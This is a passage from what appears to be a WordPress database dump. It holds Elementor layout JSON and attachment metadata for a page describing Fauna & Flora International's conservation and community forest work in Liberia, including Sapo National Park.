Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"58a3e8b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"615c3465\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6bc66929\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"581f0bca\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:ffi\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(20621,3006,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a3e5fad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Fauna &amp; Flora International (FFI) began working in Liberia in 1997 and we played a crucial role, together with our partners, in re-establishing operations in the country\\u2019s oldest protected area \\u2013 Sapo National Park \\u2013 after years of civil conflict.<\\/p><p>Drawing on this work in Sapo, we have since worked closely with our partners to help identify and prioritise sites for a protected area network across Liberia and establish the foundations for sustainable forest and environmental management.<\\/p><p>We are also working extensively to improve collaboration between local, national, regional and private stakeholders across various sectors and national boundaries to reduce threats to biodiversity from subsistence pressures, oil palm operations and large-scale mining operations.<\\/p><p>Recognising the value of Liberian forests for carbon storage, biodiversity conservation and community well-being, we are also playing a lead role in the development of REDD+ project sites in the country.<\\/p><p>Community involvement in decision making is central to strengthening forest management and governance in a post-conflict Liberia, and we have supported a range of activities to ensure that communities within and surrounding East Nimba Nature Reserve, Wonegizi and Wologizi Proposed Protected Areas, and Sapo National Park are properly supported to engage in protected area management and conservation.<\\/p><p>FFI is also supporting Liberia\\u2019s up-and-coming conservationists by helping to build conservation capacity at a national level \\u2013 something that is currently limited due to a lack of practical and academic training opportunities. FFI is tackling these challenges by developing appropriate infrastructure and training courses, including university-level teaching as well as practical skills training such as biomonitoring, and conservation management skills such as proposal writing and grant management.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9a4752\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"602e7b89\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5a027f71\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f156dc7\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"ffi\\\",\\\"tag_id\\\":\\\"54\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"ffi\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"58a3e8b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"615c3465\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6bc66929\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"581f0bca\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:ffi\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(20622,3006,'_elementor_controls_usage','a:5:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(20626,3006,'_dp_original','3005'),(20627,3005,'_edit_lock','1629235162:42'),(20628,3005,'_jetpack_related_posts_cache','a:1:{s:32:\"387e53bc056fb081449b6ed79a90f200\";a:2:{s:7:\"expires\";i:1628343724;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:1612;}i:1;a:1:{s:2:\"id\";i:1602;}i:2;a:1:{s:2:\"id\";i:1614;}}}}'),(20629,3004,'_edit_lock','1663330244:42'),(20630,3004,'_edit_last','42'),(20633,3006,'_edit_lock','1663166384:42'),(20634,3006,'_edit_last','42'),(20637,3005,'_edit_last','42'),(20638,3012,'_wp_attached_file','2020/02/West-African-sunset-Liberia.jpg'),(20639,3012,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:682;s:4:\"file\";s:39:\"2020/02/West-African-sunset-Liberia.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:39:\"West-African-sunset-Liberia-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"West-African-sunset-Liberia-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:39:\"West-African-sunset-Liberia-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(20640,2991,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1628118935;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3259;}i:1;a:1:{s:2:\"id\";i:3261;}i:2;a:1:{s:2:\"id\";i:1751;}}}}'),(20641,2989,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1628945967;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:1724;}i:1;a:1:{s:2:\"id\";i:570;}i:2;a:1:{s:2:\"id\";i:3099;}}}}'),(20642,3006,'_jetpack_related_posts_cache','a:1:{s:32:\"387e53bc056fb081449b6ed79a90f200\";a:2:{s:7:\"expires\";i:1627263495;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:1582;}i:1;a:1:{s:2:\"id\";i:3005;}i:2;a:1:{s:2:\"id\";i:1614;}}}}'),(20643,3004,'_jetpack_related_posts_cache','a:1:{s:32:\"387e53bc056fb081449b6ed79a90f200\";a:2:{s:7:\"expires\";i:1628889757;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3006;}i:1;a:1:{s:2:\"id\";i:2457;}i:2;a:1:{s:2:\"id\";i:3041;}}}}'),(20644,3015,'_wp_attached_file','2019/11/logo-ci.png'),(20645,3015,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:500;s:6:\"height\";i:160;s:4:\"file\";s:19:\"2019/11/logo-ci.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"logo-ci-300x96.png\";s:5:\"width\";i:300;s:6:\"height\";i:96;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"logo-ci-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(20646,3016,'_wp_attached_file','2019/11/ci-office-pic.png'),(20647,3016,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:399;s:6:\"height\";i:126;s:4:\"file\";s:25:\"2019/11/ci-office-pic.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"ci-office-pic-300x95.png\";s:5:\"width\";i:300;s:6:\"height\";i:95;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"ci-office-pic-150x126.png\";s:5:\"width\";i:150;s:6:\"height\";i:126;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(20648,3017,'_wp_attached_file','2019/11/ffi.jpg'),(20649,3017,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:630;s:4:\"file\";s:15:\"2019/11/ffi.jpg\";s:5:\"sizes\";a:4:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"ffi-300x158.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:158;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:16:\"ffi-1024x538.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:538;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"ffi-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"ffi-768x403.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:403;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:30:\"ffi_new_logo_text_right_colour\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:30:\"ffi_new_logo_text_right_colour\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(20650,1614,'_thumbnail_id','3192'),(20651,3018,'_elementor_edit_mode','builder'),(20652,3018,'_elementor_template_type','wp-post'),(20653,3018,'_elementor_version','2.7.5'),(20654,3018,'_wp_page_template','default'),(20655,3018,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a3e5fad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Fauna &amp; Flora International (FFI) began working in Liberia in 1997 and we played a crucial role, together with our partners, in re-establishing operations in the country\\u2019s oldest protected area \\u2013 Sapo National Park \\u2013 after years of civil conflict.<\\/p><p>Drawing on this work in Sapo, we have since worked closely with our partners to help identify and prioritise sites for a protected area network across Liberia and establish the foundations for sustainable forest and environmental management.<\\/p><p>We are also working extensively to improve collaboration between local, national, regional and private stakeholders across various sectors and national boundaries to reduce threats to biodiversity from subsistence pressures, oil palm operations and large-scale mining operations.<\\/p><p>Recognising the value of Liberian forests for carbon storage, biodiversity conservation and community well-being, we are also playing a lead role in the development of REDD+ project sites in the country.<\\/p><p>Community involvement in decision making is central to strengthening forest management and governance in a post-conflict Liberia, and we have supported a range of activities to ensure that communities within and surrounding East Nimba Nature Reserve, Wonegizi and Wologizi Proposed Protected Areas, and Sapo National Park are properly supported to engage in protected area management and conservation.<\\/p><p>FFI is also supporting Liberia\\u2019s up-and-coming conservationists by helping to build conservation capacity at a national level \\u2013 something that is currently limited due to a lack of practical and academic training opportunities. FFI is tackling these challenges by developing appropriate infrastructure and training courses, including university-level teaching as well as practical skills training such as biomonitoring, and conservation management skills such as proposal writing and grant management.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9a4752\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"602e7b89\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5a027f71\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f156dc7\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"ffi\\\",\\\"tag_id\\\":\\\"54\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"ffi\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"58a3e8b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"615c3465\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6bc66929\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"581f0bca\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:ffi\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(20656,3018,'_elementor_controls_usage','a:6:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:22:\"jet-blog-smart-listing\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:8:{s:13:\"featured_post\";i:1;s:13:\"posts_columns\";i:1;s:10:\"image_size\";i:1;s:14:\"image_position\";i:1;s:14:\"excerpt_length\";i:1;s:9:\"read_more\";i:1;s:9:\"show_meta\";i:1;s:14:\"show_terms_tax\";i:1;}s:13:\"section_query\";a:3:{s:16:\"use_custom_query\";i:1;s:12:\"custom_query\";i:1;s:9:\"post_type\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_post_style\";a:6:{s:16:\"post_title_color\";i:1;s:32:\"post_title_typography_typography\";i:1;s:33:\"post_title_typography_font_weight\";i:1;s:15:\"post_text_color\";i:1;s:31:\"post_text_typography_typography\";i:1;s:30:\"post_text_typography_font_size\";i:1;}s:25:\"section_post_button_style\";a:2:{s:20:\"post_button_bg_color\";i:1;s:26:\"post_button_hover_bg_color\";i:1;}s:25:\"section_pagination_arrows\";a:1:{s:27:\"arrows_style_popover_toggle\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(20658,3018,'_thumbnail_id','3017'),(20659,3019,'_wp_attached_file','2019/11/Mota.jpg'),(20660,3019,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:226;s:6:\"height\";i:223;s:4:\"file\";s:16:\"2019/11/Mota.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"Mota-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12: